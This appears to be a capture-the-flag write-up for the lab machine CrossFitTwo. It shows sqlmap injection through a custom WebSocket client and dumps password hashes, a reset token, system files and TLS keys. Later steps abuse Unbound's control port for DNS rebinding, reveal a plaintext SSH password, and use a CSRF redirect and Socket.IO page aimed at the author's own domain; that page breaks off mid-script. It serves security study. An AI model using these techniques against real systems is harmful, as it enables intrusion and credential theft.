Basic information

Port scan

A full-port scan is needed; it finds 22, 80 and 8953:

$ nmap -p- 10.10.10.232
Starting Nmap 7.91 ( https://nmap.org ) at 2021-05-11 14:39 CST
Nmap scan report for 10.10.10.232
Host is up (0.067s latency).
Not shown: 65532 closed ports
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
8953/tcp open ub-dns-control

Nmap done: 1 IP address (1 host up) scanned in 914.51 seconds

$ nmap -sC -sV -Pn -p22,80,8953 10.10.10.232

Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2021-05-11 15:08 CST
WARNING: Service 10.10.10.232:80 had already soft-matched http, but now soft-matched rtsp; ignoring second value
WARNING: Service 10.10.10.232:80 had already soft-matched http, but now soft-matched rtsp; ignoring second value
Nmap scan report for employees.crossfit.htb (10.10.10.232)
Host is up (0.067s latency).

PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.4 (protocol 2.0)
| ssh-hostkey:
| 3072 35:0a:81:06:de:be:8c:d8:d7:27:66:db:96:94:fd:52 (RSA)
| 256 94:60:55:35:9a:1a:a8:45:a1:ae:19:cd:61:05:ec:3f (ECDSA)
|_ 256 a2:c8:6b:6e:11:b6:70:69:db:d2:60:2e:2f:d1:2f:ab (ED25519)
80/tcp open http (PHP 7.4.12)
| fingerprint-strings:
| GetRequest, HTTPOptions:
| HTTP/1.0 200 OK
| Connection: close
| Connection: close
| Content-type: text/html; charset=UTF-8
| Date: Tue, 11 May 2021 07:08:01 GMT
| Server: OpenBSD httpd
| X-Powered-By: PHP/7.4.12
| <!DOCTYPE html>
| <html lang="zxx">
| <head>
| <meta charset="UTF-8">
| <meta name="description" content="Yoga StudioCrossFit">
| <meta name="keywords" content="Yoga, unica, creative, html">
| <meta name="viewport" content="width=device-width, initial-scale=1.0">
| <meta http-equiv="X-UA-Compatible" content="ie=edge">
| <title>CrossFit</title>
| <!-- Google Font -->
| <link href="https://fonts.googleapis.com/css?family=PT+Sans:400,700&display=swap" rel="stylesheet">
| <link href="https://fonts.googleapis.com/css?family=Oswald:400,500,600,700&display=swap" rel="stylesheet">
| <!-- Css Styles -->
| <link rel="stylesheet" href="css/bootstrap.min.css" type="text/css">
|_ <link rel="styleshe
|_http-server-header: OpenBSD httpd
|_http-title: Login
8953/tcp open ssl/ub-dns-control?
| ssl-cert: Subject: commonName=unbound
| Not valid before: 2021-01-11T07:01:10
|_Not valid after: 2040-09-28T07:01:10
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 32.06 seconds

Port 80

The member area is on a separate subdomain; add it to /etc/hosts:

10.10.10.232 employees.crossfit.htb crossfit.htb

employees.crossfit.htb

Directory scan

Directory scanning both sites turns up nothing useful:

gobuster dir -u http://10.10.10.232/ -w /usr/share/seclists/Discovery/Web-Content/common.txt -x php,html,txt -b 403,404 -t 50

/about-us.php (Status: 200) [Size: 15733]
/blog.php (Status: 200) [Size: 15369]
/classes.php (Status: 200) [Size: 25946]
/contact.php (Status: 200) [Size: 8007]
/css (Status: 301) [Size: 510] [--> http://10.10.10.232/css/]
/elements.php (Status: 200) [Size: 19654]
/fonts (Status: 301) [Size: 510] [--> http://10.10.10.232/fonts/]
/img (Status: 301) [Size: 510] [--> http://10.10.10.232/img/]
/images (Status: 301) [Size: 510] [--> http://10.10.10.232/images/]
/index.php (Status: 200) [Size: 19041]
/index.php (Status: 200) [Size: 19041]
/js (Status: 301) [Size: 510] [--> http://10.10.10.232/js/]
/main.html (Status: 200) [Size: 931]
/readme.txt (Status: 200) [Size: 410]
/vendor (Status: 301) [Size: 510] [--> http://10.10.10.232/vendor/]

gobuster dir -u http://employees.crossfit.htb/ -w /usr/share/seclists/Discovery/Web-Content/common.txt -x php,html,txt -b 403,404 -t 50

/css (Status: 301) [Size: 510] [--> http://employees.crossfit.htb/css/]
/index.php (Status: 200) [Size: 4412]
/index.php (Status: 200) [Size: 4412]
/js (Status: 301) [Size: 510] [--> http://employees.crossfit.htb/js/]
/vendor (Status: 301) [Size: 510] [--> http://employees.crossfit.htb/vendor/]

websocket

Looking at the traffic reveals a WebSocket to gym.crossfit.htb:

Add this domain to /etc/hosts as well; the relevant code is in ws.min.js:

chat

After adding the hosts entry and visiting the site, a chat box appears in the bottom-right corner and disappears automatically after 31 seconds:

It also uses a one-time token: every response carries a new token, which must be sent with the next request:

websocket-client

So we can write our own client to enumerate information:

composer require amphp/websocket-client

php -S 0.0.0.0:7777

ws.min.js

function updateScroll() {
    var e = document.getElementById('chats');
    e.scrollTop = e.scrollHeight
}
var token,
    ws = new WebSocket('ws://gym.crossfit.htb/ws/'),
    pingTimeout = setTimeout(() => {
        ws.close(),
        $('.chat-main').remove()
    }, 31000);
function check_availability(e) {
    var s = new Object;
    s.message = 'available',
    s.params = String(e),
    s.token = token,
    ws.send(JSON.stringify(s))
}
$('.chat-content').slideUp(),
$('.hide-chat-box').click(function () {
    $('.chat-content').slideUp()
}),
$('.show-chat-box').click(function () {
    $('.chat-content').slideDown(),
    updateScroll()
}),
$('.close-chat-box').click(function () {
    $('.chat-main').remove()
}),
ws.onopen = function () {
},
ws.onmessage = function (e) {
    'ping' === e.data ? (ws.send('pong'), clearTimeout(pingTimeout)) : (response = JSON.parse(e.data), answer = response.message, answer.startsWith('Hello!') && $('#ws').show(), token = response.token, $('#chat-messages').append('<li class="receive-msg float-left mb-2"><div class="receive-msg-desc float-left ml-2"><p class="msg_display bg-white m-0 pt-1 pb-1 pl-2 pr-2 rounded">' + answer + '</p></div></li>'), updateScroll())
},
$('#sendmsg').on('keypress', function (e) {
    if (13 === e.which) {
        $(this).attr('disabled', 'disabled');
        var s = $('#sendmsg').val();
        if ('' !== s) {
            $('#chat-messages').append('<li class="send-msg float-right mb-2"><p class="msg_display pt-1 pb-1 pl-2 pr-2 m-0 rounded">' + s + '</p></li>');
            var t = new Object;
            t.message = s,
            t.token = token,
            ws.send(JSON.stringify(t)),
            $('#sendmsg').val(''),
            $(this).removeAttr('disabled'),
            updateScroll()
        }
    }
});

websocket-client.php

<?php

require 'vendor/autoload.php';

use Amp\Websocket\Client;

Amp\Loop::run(function () {
    $connection = yield Client\connect('ws://gym.crossfit.htb/ws/');
    // The greeting from the server carries the one-time token for our next frame.
    $message = yield $connection->receive();
    $payload = yield $message->buffer();
    $token = json_decode($payload, true)["token"];
    // Same frame shape as check_availability() in ws.min.js, with params taken from ?id=
    $check = json_encode(array('message' => 'available', 'params' => $_GET['id'], 'token' => $token));
    yield $connection->send($check);
    $message = yield $connection->receive();
    $payload = yield $message->buffer();
    header("Content-Type: application/json");
    // Echo the raw JSON; printf() would interpret any '%' in the payload as a format directive.
    echo $payload;

    $connection->close();
});

SQL injection

The WebSocket lookup is backed by the database as well, so it can be tested for SQL injection:

sqlmap -u http://10.211.55.12:7777/client.php\?id\=1 --batch --string='Good news!'
sqlmap -u http://10.211.55.12:7777/client.php\?id\=1 --batch --string='Good news!' --technique=B --threads=10

dbs

sqlmap -u http://10.211.55.12:7777/client.php\?id\=1 --batch --string='Good news!' --technique=B --threads=10 --dbs

available databases [3]:
[*] crossfit
[*] employees
[*] information_schema

employees

Two tables: one holds account information, the other password-reset tokens:

sqlmap -u http://10.211.55.12:7777/client.php\?id\=1 --batch --string='Good news!' --technique=B --threads=10 -D employees --tables

Database: employees
[2 tables]
+----------------+
| employees |
| password_reset |
+----------------+

employees table

david.palmer@crossfit.htb is the administrator:

sqlmap -u http://10.211.55.12:7777/client.php\?id\=1 --batch --string='Good news!' --technique=B --threads=10 -D employees -T employees --dump

Database: employees
Table: employees
[4 entries]
+----+-----------------------------+---------------+------------------------------------------------------------------+
| id | email | username | password |
+----+-----------------------------+---------------+------------------------------------------------------------------+
| 1 | david.palmer@crossfit.htb | administrator | fff34363f4d15e958f0fb9a7c2e7cc550a5672321d54b5712cd6e4fa17cd2ac8 |
| 2 | will.smith@crossfit.htb | wsmith | 06b4daca29092671e44ef8fad8ee38783b4294d9305853027d1b48029eac0683 |
| 3 | maria.williams@crossfit.htb | mwilliams | fe46198cb29909e5dd9f61af986ca8d6b4b875337261bdaa5204f29582462a9c |
| 4 | jack.parker@crossfit.htb | jparker | 4de9923aba6554d148dbcd3369ff7c6e71841286e5106a69e250f779770b3648 |
+----+-----------------------------+---------------+------------------------------------------------------------------+

password_reset table

sqlmap -u http://10.211.55.12:7777/client.php\?id\=1 --batch --string='Good news!' --technique=B --threads=10 -D employees -T password_reset --dump

Database: employees
Table: password_reset
[0 entries]
+-------+-------+---------+
| token | email | expires |
+-------+-------+---------+
+-------+-------+---------+

password_reset

Try resetting the administrator's password:

The token can be read from the table, but at this point the format in which it is used is unknown:

sqlmap -u http://10.211.55.12:7777/client.php\?id\=1 --batch --string='Good news!' --technique=B --threads=10 -D employees -T password_reset --dump --fresh-queries

Database: employees
Table: password_reset
[1 entry]
+------------------------------------------------------------------+---------------------------+---------------------+
| token | email | expires |
+------------------------------------------------------------------+---------------------------+---------------------+
| 5fda7b56a8c5b514a528fc02fcf583584436aa28b7eafe2db0790c36a805a284 | david.palmer@crossfit.htb | 2021-05-11 08:54:10 |
+------------------------------------------------------------------+---------------------------+---------------------+

File read

Further enumeration is needed; try reading files through SQL (very slow), starting with the OpenBSD configuration files:

/etc/passwd

sqlmap -u http://10.211.55.12:7777/client.php\?id\=1 --batch --string='Good news!' --technique=B --threads=10  --file-read="/etc/passwd"

root:*:0:0:Charlie &:/root:/bin/ksh
daemon:*:1:1:The devil himself:/root:/sbin/nologin
operator:*:2:5:System &:/operator:/sbin/nologin
bin:*:3:7:Binaries Commands and Source:/:/sbin/nologin
build:*:21:21:base and xenocara build:/var/empty:/bin/ksh
sshd:*:27:27:sshd privsep:/var/empty:/sbin/nologin
_portmap:*:28:28:portmap:/var/empty:/sbin/nologin
_identd:*:29:29:identd:/var/empty:/sbin/nologin
_rstatd:*:30:30:rpc.rstatd:/var/empty:/sbin/nologin
_rusersd:*:32:32:rpc.rusersd:/var/empty:/sbin/nologin
_fingerd:*:33:33:fingerd:/var/empty:/sbin/nologin
_x11:*:35:35:X Server:/var/empty:/sbin/nologin
_unwind:*:48:48:Unwind Daemon:/var/empty:/sbin/nologin
_switchd:*:49:49:Switch Daemon:/var/empty:/sbin/nologin
_traceroute:*:50:50:traceroute privdrop user:/var/empty:/sbin/nologin
_ping:*:51:51:ping privdrop user:/var/empty:/sbin/nologin
_unbound:*:53:53:Unbound Daemon:/var/unbound:/sbin/nologin
_dpb:*:54:54:dpb privsep:/var/empty:/sbin/nologin
_pbuild:*:55:55:dpb build user:/nonexistent:/sbin/nologin
_pfetch:*:56:56:dpb fetch user:/nonexistent:/sbin/nologin
_pkgfetch:*:57:57:pkg fetch user:/nonexistent:/sbin/nologin
_pkguntar:*:58:58:pkg untar user:/nonexistent:/sbin/nologin
_spamd:*:62:62:Spam Daemon:/var/empty:/sbin/nologin
www:*:67:67:HTTP Server:/var/www:/sbin/nologin
_isakmpd:*:68:68:isakmpd privsep:/var/empty:/sbin/nologin
_rpki-client:*:70:70:rpki-client user:/nonexistent:/sbin/nologin
_syslogd:*:73:73:Syslog Daemon:/var/empty:/sbin/nologin
_pflogd:*:74:74:pflogd privsep:/var/empty:/sbin/nologin
_bgpd:*:75:75:BGP Daemon:/var/empty:/sbin/nologin
_tcpdump:*:76:76:tcpdump privsep:/var/empty:/sbin/nologin
_dhcp:*:77:77:DHCP programs:/var/empty:/sbin/nologin
_mopd:*:78:78:MOP Daemon:/var/empty:/sbin/nologin
_tftpd:*:79:79:TFTP Daemon:/var/empty:/sbin/nologin
_rbootd:*:80:80:rbootd Daemon:/var/empty:/sbin/nologin
_ppp:*:82:82:PPP utilities:/var/empty:/sbin/nologin
_ntp:*:83:83:NTP Daemon:/var/empty:/sbin/nologin
_ftp:*:84:84:FTP Daemon:/var/empty:/sbin/nologin
_ospfd:*:85:85:OSPF Daemon:/var/empty:/sbin/nologin
_hostapd:*:86:86:HostAP Daemon:/var/empty:/sbin/nologin
_dvmrpd:*:87:87:DVMRP Daemon:/var/empty:/sbin/nologin
_ripd:*:88:88:RIP Daemon:/var/empty:/sbin/nologin
_relayd:*:89:89:Relay Daemon:/var/empty:/sbin/nologin
_ospf6d:*:90:90:OSPF6 Daemon:/var/empty:/sbin/nologin
_snmpd:*:91:91:SNMP Daemon:/var/empty:/sbin/nologin
_ypldap:*:93:93:YP to LDAP Daemon:/var/empty:/sbin/nologin
_rad:*:94:94:IPv6 Router Advertisement Daemon:/var/empty:/sbin/nologin
_smtpd:*:95:95:SMTP Daemon:/var/empty:/sbin/nologin
_rwalld:*:96:96:rpc.rwalld:/var/empty:/sbin/nologin
_nsd:*:97:97:NSD Daemon:/var/empty:/sbin/nologin
_ldpd:*:98:98:LDP Daemon:/var/empty:/sbin/nologin
_sndio:*:99:99:sndio privsep:/var/empty:/sbin/nologin
_ldapd:*:100:100:LDAP Daemon:/var/empty:/sbin/nologin
_iked:*:101:101:IKEv2 Daemon:/var/empty:/sbin/nologin
_iscsid:*:102:102:iSCSI Daemon:/var/empty:/sbin/nologin
_smtpq:*:103:103:SMTP Daemon:/var/empty:/sbin/nologin
_file:*:104:104:file privsep:/var/empty:/sbin/nologin
_radiusd:*:105:105:RADIUS Daemon:/var/empty:/sbin/nologin
_eigrpd:*:106:106:EIGRP Daemon:/var/empty:/sbin/nologin
_vmd:*:107:107:VM Daemon:/var/empty:/sbin/nologin
_tftp_proxy:*:108:108:tftp proxy daemon:/nonexistent:/sbin/nologin
_ftp_proxy:*:109:109:ftp proxy daemon:/nonexistent:/sbin/nologin
_sndiop:*:110:110:sndio privileged user:/var/empty:/sbin/nologin
_syspatch:*:112:112:syspatch unprivileged user:/var/empty:/sbin/nologin
_slaacd:*:115:115:SLAAC Daemon:/var/empty:/sbin/nologin
nobody:*:32767:32767:Unprivileged user:/nonexistent:/sbin/nologin
_mysql:*:502:502:MySQL Account:/nonexistent:/sbin/nologin
lucille:*:1002:1002:,,,:/home/lucille:/bin/csh
node:*:1003:1003::/home/node:/bin/ksh
_dbus:*:572:572:dbus user:/nonexistent:/sbin/nologin
_redis:*:686:686:redis account:/var/redis:/sbin/nologin
david:*:1004:1004:,,,:/home/david:/bin/csh
john:*:1005:1005::/home/john:/bin/csh
ftp:*:1006:1006:FTP:/home/ftp:/sbin/nologin

/etc/login.conf

According to this configuration file, a YubiKey is in use:

sqlmap -u http://10.211.55.12:7777/client.php\?id\=1 --batch --string='Good news!' --technique=B --threads=10  --file-read="/etc/login.conf"

# $OpenBSD: login.conf,v 1.16 2020/06/23 15:45:34 naddy Exp $

#
# Sample login.conf file. See login.conf(5) for details.
#

#
# Standard authentication styles:
#
# passwd Use only the local password file
# chpass Do not authenticate, but change user's password (change
# the YP password if the user has one, else change the
# local password)
# lchpass Do not login; change user's local password instead
# radius Use radius authentication
# reject Use rejected authentication
# skey Use S/Key authentication
# activ ActivCard X9.9 token authentication
# crypto CRYPTOCard X9.9 token authentication
# snk Digital Pathways SecureNet Key authentication
# tis TIS Firewall Toolkit authentication
# token Generic X9.9 token authentication
# yubikey YubiKey authentication
#

# Default allowed authentication styles
auth-defaults:auth=passwd,skey:

# Default allowed authentication styles for authentication type ftp
auth-ftp-defaults:auth-ftp=passwd:

#
# The default values
# To alter the default authentication types change the line:
# :tc=auth-defaults:\
# to read something like: (enables passwd, "myauth", and activ)
# :auth=passwd,myauth,activ:\
# Any value changed in the daemon class should be reset in default
# class.
#
default:\
:path=/usr/bin /bin /usr/sbin /sbin /usr/X11R6/bin /usr/local/bin /usr/local/sbin:\
:umask=022:\
:datasize-max=768M:\
:datasize-cur=768M:\
:maxproc-max=256:\
:maxproc-cur=128:\
:openfiles-max=102400:\
:openfiles-cur=102400:\
:stacksize-cur=4M:\
:localcipher=blowfish,a:\
:tc=auth-defaults:\
:tc=auth-ftp-defaults:

#
# Settings used by /etc/rc and root
# This must be set properly for daemons started as root by inetd as well.
# Be sure to reset these values to system defaults in the default class!
#
daemon:\
:ignorenologin:\
:datasize=infinity:\
:maxproc=infinity:\
:openfiles-max=102400:\
:openfiles-cur=102400:\
:stacksize-cur=8M:\
:auth-ssh=yubikey:\
:auth-su=reject:\
:tc=default:

#
# Staff have fewer restrictions and can login even when nologins are set.
#
staff:\
:datasize-cur=1536M:\
:datasize-max=infinity:\
:maxproc-max=512:\
:maxproc-cur=256:\
:ignorenologin:\
:requirehome@:\
:tc=default:

#
# Authpf accounts get a special motd and shell
#
authpf:\
:welcome=/etc/motd.authpf:\
:shell=/usr/sbin/authpf:\
:tc=default:

#
# Building ports with DPB uses raised limits
#
pbuild:\
:datasize-max=infinity:\
:datasize-cur=8192M:\
:maxproc-max=1024:\
:maxproc-cur=384:\
:priority=5:\
:tc=default:

#
# Override resource limits for certain daemons started by rc.d(8)
#
bgpd:\
:openfiles=512:\
:tc=daemon:

unbound:\
:openfiles=512:\
:tc=daemon:

/etc/ssh/sshd_config

root requires a public key plus password; non-root users require only a password:

sqlmap -u http://10.211.55.12:7777/client.php\?id\=1 --batch --string='Good news!' --technique=B --threads=10  --file-read="/etc/ssh/sshd_config"

# $OpenBSD: sshd_config,v 1.103 2018/04/09 20:41:22 tj Exp $

# This is the sshd server system-wide configuration file. See
# sshd_config(5) for more information.

# The strategy used for options in the default sshd_config shipped with
# OpenSSH is to specify options with their default value where
# possible, but leave them commented. Uncommented options override the
# default value.

#Port 22
#AddressFamily any
#ListenAddress 0.0.0.0
#ListenAddress ::

#HostKey /etc/ssh/ssh_host_rsa_key
#HostKey /etc/ssh/ssh_host_ecdsa_key
#HostKey /etc/ssh/ssh_host_ed25519_key

# Ciphers and keying
#RekeyLimit default none

# Logging
#SyslogFacility AUTH
#LogLevel INFO

# Authentication:

#LoginGraceTime 2m
PermitRootLogin yes
#StrictModes yes
#MaxAuthTries 6
#MaxSessions 10

#PubkeyAuthentication yes

# The default is to check both .ssh/authorized_keys and .ssh/authorized_keys2
# but this is overridden so installations will only check .ssh/authorized_keys
AuthorizedKeysFile .ssh/authorized_keys

#AuthorizedPrincipalsFile none

#AuthorizedKeysCommand none
#AuthorizedKeysCommandUser nobody

# For this to work you will also need host keys in /etc/ssh/ssh_known_hosts
#HostbasedAuthentication no
# Change to yes if you don't trust ~/.ssh/known_hosts for
# HostbasedAuthentication
#IgnoreUserKnownHosts no
# Don't read the user's ~/.rhosts and ~/.shosts files
#IgnoreRhosts yes

# To disable tunneled clear text passwords, change to no here!
#PasswordAuthentication yes
#PermitEmptyPasswords no

# Change to no to disable s/key passwords
#ChallengeResponseAuthentication yes

#AllowAgentForwarding yes
#AllowTcpForwarding yes
#GatewayPorts no
#X11Forwarding no
#X11DisplayOffset 10
#X11UseLocalhost yes
#PermitTTY yes
#PrintMotd yes
#PrintLastLog yes
#TCPKeepAlive yes
#PermitUserEnvironment no
#Compression delayed
#ClientAliveInterval 0
#ClientAliveCountMax 3
#UseDNS no
#PidFile /var/run/sshd.pid
#MaxStartups 10:30:100
#PermitTunnel no
#ChrootDirectory none
#VersionAddendum none

# no default banner path
#Banner none

# override default of no subsystems
Subsystem sftp /usr/libexec/sftp-server

# Example of overriding settings on a per-user basis
#Match User anoncvs
# X11Forwarding no
# AllowTcpForwarding no
# PermitTTY no
# ForceCommand cvs server

Match User root
AuthenticationMethods publickey,password
Match User *,!root
AuthenticationMethods password

/etc/httpd.conf

According to this configuration file, there are more virtual hosts besides chat and employees:

sqlmap -u http://10.211.55.12:7777/client.php\?id\=1 --batch --string='Good news!' --technique=B --threads=10  --file-read="/etc/httpd.conf"

# $OpenBSD: httpd.conf,v 1.20 2018/06/13 15:08:24 reyk Exp $


types {
include "/usr/share/misc/mime.types"
}

server "0.0.0.0" {
no log
listen on lo0 port 8000

root "/htdocs"
directory index index.php

location "*.php*" {
fastcgi socket "/run/php-fpm.sock"
}
}

server "employees" {
no log
listen on lo0 port 8001

root "/htdocs_employees"
directory index index.php

location "*.php*" {
fastcgi socket "/run/php-fpm.sock"
}
}

server "chat" {
no log
listen on lo0 port 8002

root "/htdocs_chat"
directory index index.html

location match "^/home$" {
request rewrite "/index.html"
}
location match "^/login$" {
request rewrite "/index.html"
}
location match "^/chat$" {
request rewrite "/index.html"
}
location match "^/favicon.ico$" {
request rewrite "/images/cross.png"
}
}

/etc/relayd.conf

This reveals crossfit-club.htb; add it to /etc/hosts:

sqlmap -u http://10.211.55.12:7777/client.php\?id\=1 --batch --string='Good news!' --technique=B --threads=10  --file-read="/etc/relayd.conf"

table<1>{127.0.0.1}
table<2>{127.0.0.1}
table<3>{127.0.0.1}
table<4>{127.0.0.1}
http protocol web{
pass request quick header "Host" value "*crossfit-club.htb" forward to <3>
pass request quick header "Host" value "*employees.crossfit.htb" forward to <2>
match request path "/*" forward to <1>
match request path "/ws*" forward to <4>
http websockets
}

table<5>{127.0.0.1}
table<6>{127.0.0.1 127.0.0.2 127.0.0.3 127.0.0.4}
http protocol portal{
pass request quick path "/" forward to <5>
pass request quick path "/index.html" forward to <5>
pass request quick path "/home" forward to <5>
pass request quick path "/login" forward to <5>
pass request quick path "/chat" forward to <5>
pass request quick path "/js/*" forward to <5>
pass request quick path "/css/*" forward to <5>
pass request quick path "/fonts/*" forward to <5>
pass request quick path "/images/*" forward to <5>
pass request quick path "/favicon.ico" forward to <5>
pass forward to <6>
http websockets
}

relay web{
listen on "0.0.0.0" port 80
protocol web
forward to <1> port 8000
forward to <2> port 8001
forward to <3> port 9999
forward to <4> port 4419
}

relay portal{
listen on 127.0.0.1 port 9999
protocol portal
forward to <5> port 8002
forward to <6> port 5000 mode source-hash
}

crossfit-club.htb

Another site that requires login:

API enumeration

The traffic shows /api/auth, so enumerate the other API endpoints:

gobuster dir -w /usr/share/seclists/Discovery/Web-Content/api/objects.txt -e -t 20 -x json -u http://crossfit-club.htb/api/

http://crossfit-club.htb/api/auth (Status: 200) [Size: 66]
http://crossfit-club.htb/api/ping (Status: 200) [Size: 71]

gobuster dir -w /usr/share/seclists/Discovery/Web-Content/api/objects.txt -e -t 20 -x json -m POST -u http://crossfit-club.htb/api/

http://crossfit-club.htb/api/Login (Status: 200) [Size: 50]
http://crossfit-club.htb/api/login (Status: 200) [Size: 50]
http://crossfit-club.htb/api/signup (Status: 200) [Size: 50]

signup

The API exposes a signup endpoint while signup on the web page is disabled, so try it directly through the API:

The response says only the administrator can add users, so registration is not possible:

signup.sh

#!/bin/bash

RHOST="crossfit-club.htb"
RPORT=80
USER="miao"
PASS='miao@123'
EMAIL="miao@crossfit.htb"
COOKIE="$(mktemp -u)"
PROXY="127.0.0.1:8087"

# Get CSRF token (the -c cookie jar keeps the session the token belongs to)
TOKEN=$(curl -s \
    -c "${COOKIE}" \
    -x "${PROXY}" \
    "http://${RHOST}:${RPORT}/api/auth" \
    | jq -r .token)

# Sign up
cat - <<EOF > signup.json
{
    "username": "${USER}",
    "password": "${PASS}",
    "email" : "${EMAIL}",
    "confirm" : "${EMAIL}"
}
EOF

curl -s \
    -b "${COOKIE}" \
    -H "Content-Type: application/json" \
    -H "X-CSRF-TOKEN: ${TOKEN}" \
    -d "$(jq -c . signup.json)" \
    -x "${PROXY}" \
    "http://${RHOST}:${RPORT}/api/signup" | jq .

# Clean up
rm -f "${COOKIE}"

Unbound

Recall port 8953 from the scan: it is Unbound's control port. unbound-control needs the server certificate, the client key and the client certificate, so read those files through SQL as well:

/var/unbound/etc/unbound.conf

First read the configuration file; it gives the paths of the relevant files:

sqlmap -u http://10.211.55.12:7777/client.php\?id\=1 --batch --string='Good news!' --technique=B --threads=10  --file-read="/var/unbound/etc/unbound.conf"

server:
interface: 127.0.0.1
interface: ::1
access-control: 0.0.0.0/0 refuse
access-control: 127.0.0.0/8 allow
access-control: ::0/0 refuse
access-control: ::1 allow
hide-identity: yes
hide-version: yes
msg-cache-size: 0
rrset-cache-size: 0
cache-max-ttl: 0
cache-max-negative-ttl: 0
auto-trust-anchor-file: "/var/unbound/db/root.key"
val-log-level: 2
aggressive-nsec: yes
include: "/var/unbound/etc/conf.d/local_zones.conf"

remote-control:
control-enable: yes
control-interface: 0.0.0.0
control-use-cert: yes
server-key-file: "/var/unbound/etc/tls/unbound_server.key"
server-cert-file: "/var/unbound/etc/tls/unbound_server.pem"
control-key-file: "/var/unbound/etc/tls/unbound_control.key"
control-cert-file: "/var/unbound/etc/tls/unbound_control.pem"

download files

Download the required files:

sqlmap -u http://10.211.55.12:7777/client.php\?id\=1 --batch --string='Good news!' --technique=B --threads=10  --file-read="/var/unbound/etc/tls/unbound_server.pem" 
sqlmap -u http://10.211.55.12:7777/client.php\?id\=1 --batch --string='Good news!' --technique=B --threads=10 --file-read="/var/unbound/etc/tls/unbound_control.key"
sqlmap -u http://10.211.55.12:7777/client.php\?id\=1 --batch --string='Good news!' --technique=B --threads=10 --file-read="/var/unbound/etc/tls/unbound_control.pem"

If that is too slow, just use scp; the password used here is only obtained later in the writeup:

scp david@10.10.10.232:/var/unbound/etc/tls/unbound_server.pem unbound_server.pem
scp david@10.10.10.232:/var/unbound/etc/tls/unbound_control.key unbound_control.key
scp david@10.10.10.232:/var/unbound/etc/tls/unbound_control.pem unbound_control.pem


ssh david@10.10.10.232
NWBFcSe3ws4VDhTB

status

Then test remote control using a local configuration file:

crossfit.conf

remote-control:
    server-cert-file: "/home/miao/Desktop/HTB/CrossFitTwo/unbound_server.pem"
    control-key-file: "/home/miao/Desktop/HTB/CrossFitTwo/unbound_control.key"
    control-cert-file: "/home/miao/Desktop/HTB/CrossFitTwo/unbound_control.pem"

Password reset & DNS rebinding

From the relayd configuration above we know the Host match is on *employees.crossfit.htb, so if we prepend other characters to the hostname and control the DNS for that name, we may be able to hijack the password-reset link.

add_forward

Add a rule in Unbound that forwards DNS queries for the name to our DNS server:

unbound-control -c crossfit.conf -s 10.10.10.232 forward_add +i xemployees.crossfit.htb 10.10.14.14

dnschef

sudo python3 dnschef.py -i 10.10.14.14 --fakedomains xemployees.crossfit.htb --fakeip 10.10.14.14

Done this way, the response says only localhost is allowed:

Changing the answer to 127.0.0.1 lets the request go through, but then we never receive it:

DNS rebinding

So this calls for DNS rebinding; through it we obtain the format of the password-reset link:

The two DNS answers and the request have to be quick:

sudo python3 dnschef.py -i 10.10.14.14 --fakedomains xemployees.crossfit.htb --fakeip 127.0.0.1
sudo python3 dnschef.py -i 10.10.14.14 --fakedomains xemployees.crossfit.htb --fakeip 10.10.14.14

GET /password-reset.php?token=xxx
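Two things make the hijack above possible: relayd's leading-* wildcard accepts any hostname ending in employees.crossfit.htb, and the application validates a name and then connects to it after a second lookup. As an added example that is not part of the original writeup, this models both the glob and the check-then-resolve window, and shows the exact-allowlist and resolve-once-then-pin forms that close them; the allowlist contents and the 64-hex-character token format are assumptions taken from the page's values.

```javascript
// Hosts for which a password-reset link may ever be generated: an exact set, not a glob.
const RESET_LINK_HOSTS = new Set(['employees.crossfit.htb']);

// Models the leading-* wildcard in relayd's `header "Host" value "*employees.crossfit.htb"`:
// any name that merely ends in the pattern reaches the employees backend.
function relaydHostMatches(pattern, host) {
  return pattern.startsWith('*') ? host.endsWith(pattern.slice(1)) : pattern === host;
}

// Normalise the Host header (case, port) and accept only an exact allowlist entry.
function trustedHost(hostHeader) {
  if (typeof hostHeader !== 'string') return null;
  const h = hostHeader.trim().toLowerCase().replace(/:\d+$/, '');
  return RESET_LINK_HOSTS.has(h) ? h : null;
}

// Hardened link builder: the hostname comes from the allowlist, never from the glob match.
function buildResetLink(hostHeader, token) {
  const host = trustedHost(hostHeader);
  if (host === null) throw new Error('Host header not in allowlist');
  if (!/^[0-9a-f]{64}$/.test(token)) throw new Error('token must be 64 hex characters');
  return `http://${host}/password-reset.php?token=${token}`;
}

// Loopback test behind the application's "only localhost" rule.
function isLoopback(ip) {
  return /^127\./.test(ip) || ip === '::1' || ip === '::ffff:127.0.0.1';
}

// The pattern the page defeats: validate one lookup, then connect using a second lookup,
// leaving the window in which the two dnschef answers differ.
function connectTargetUnpinned(resolve) {
  if (!isLoopback(resolve())) throw new Error('only localhost allowed');
  return resolve();
}

// Rebinding-resistant: resolve once, validate that address, connect to that same address.
function connectTargetPinned(resolve) {
  const ip = resolve();
  if (!isLoopback(ip)) throw new Error('only localhost allowed');
  return ip;
}

// Constructed resolver replaying the page's two answers in order: 127.0.0.1 for the
// check, then 10.10.14.14 for the fetch. Repeats the last answer once exhausted.
function rebindingResolver(answers) {
  let i = 0;
  return () => answers[Math.min(i++, answers.length - 1)];
}
```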

CSRF

http://crossfit-club.htb is a Vue.js app; reverse-engineering and debugging it reveals Socket.IO. Since DNS rebinding gives us control of the response, we can redirect password-reset.php to our own page that includes socket.io-client.js and forward what it receives via XMLHttpRequest to nc.

Add the corresponding forward rules with unbound-control:

unbound-control -c crossfit.conf -s 10.10.10.232 forward_add +i xemployees.crossfit.htb 10.10.14.14
unbound-control -c crossfit.conf -s 10.10.10.232 forward_add +i miao.moe 10.10.14.14

sudo python3 dnschef.py -i 10.10.14.14 --fakedomains xemployees.crossfit.htb --fakeip 127.0.0.1
sudo python3 dnschef.py -i 10.10.14.14 --fakedomains xemployees.crossfit.htb,miao.moe --fakeip 10.10.14.14

Many different messages arrive; one of them concerns a password:

{"sender_id":2,"content":"Hello David, I've added a user account for you with the password `NWBFcSe3ws4VDhTB`.","roomId":2,"_id":1118}

password-reset.php

<?php header("Location: http://miao.moe/x.html"); ?>

x.html

<html>
<script src="http://crossfit-club.htb/socket.io/socket.io.js"></script>
<script>
    var socket = io("http://crossfit-club.htb");
    socket.emit("user_join", { username : "administrator" });
